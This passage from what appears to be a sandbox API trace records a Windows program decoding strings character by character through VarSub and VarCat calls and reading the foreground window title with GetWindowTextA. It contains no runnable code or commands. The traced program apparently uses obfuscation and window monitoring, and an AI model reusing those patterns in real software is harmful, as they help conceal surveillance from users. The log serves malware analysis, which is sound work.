cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.033] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0166.033] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.034] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0166.034] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.034] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0166.035] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.036] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0166.036] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.036] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0166.037] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.037] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0166.037] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.038] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0166.038] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.039] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0166.039] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.039] GetForegroundWindow () returned 0x102c2 [0166.051] GetLastError () returned 0x0 [0166.051] SysStringLen (param_1=" ") returned 0xff [0166.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0166.051] SysStringLen (param_1=" ") returned 0xff [0166.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0166.051] GetWindowTextA (in: hWnd=0x102c2, lpString=0x11644c4, nMaxCount=255 | out: lpString="Activity Arrive Event") returned 21 [0166.051] GetLastError () returned 0x0 [0166.052] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0166.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0166.052] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0166.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Activity Arrive Event") returned 256 [0166.052] SysStringLen (param_1="Act") returned 0x3 [0166.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Act", cchWideChar=4, lpMultiByteStr=0x1159724, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Act", lpUsedDefaultChar=0x0) returned 4 [0166.052] SetWindowTextA (hWnd=0x103c4, lpString="Act") returned 1 [0166.053] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0166.053] GetFocus () returned 0x0 [0166.053] lstrlenA (lpString="Act") returned 3 [0166.053] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x1159724) returned 0x1 [0166.053] IsWindow (hWnd=0x103c4) returned 1 [0166.053] IsWindow (hWnd=0x103c4) returned 1 [0166.054] IsWindow (hWnd=0x103c4) returned 1 [0166.054] IsWindow (hWnd=0x103c4) returned 1 [0166.054] GetFocus () returned 0x0 [0166.055] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0166.055] GetFocus () returned 0x0 [0166.055] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x4) returned 0x10ebcd0 [0166.055] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x4, lParam=0x10ebcd0) returned 0x3 [0166.055] GetFocus () returned 0x0 [0166.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Act", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0166.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Act", cbMultiByte=-1, lpWideCharStr=0x1159724, cchWideChar=4 | out: lpWideCharStr="Act") returned 4 [0166.055] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0166.055] VarCmp (pvarLeft=0x28f990, pvarRight=0x28f9f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0166.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.057] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0166.057] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.058] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="I", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="I") returned 1 [0166.058] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.059] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0x115979c, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0166.059] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Q", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.059] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="D", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr="D") returned 1 [0166.060] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.060] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="O", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0166.061] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.061] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x115979c, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0166.061] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.086] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0166.086] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.087] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0166.087] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.088] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0166.088] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.089] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0166.089] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.090] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0166.090] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.091] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0166.091] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.092] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.092] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0166.092] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.092] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0166.093] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.222] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0166.222] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.222] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0166.223] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.223] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0166.223] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.224] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0166.224] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.225] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0166.225] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.226] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0166.226] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.226] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0166.227] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.227] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0166.228] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.228] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.228] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0166.229] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.229] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, 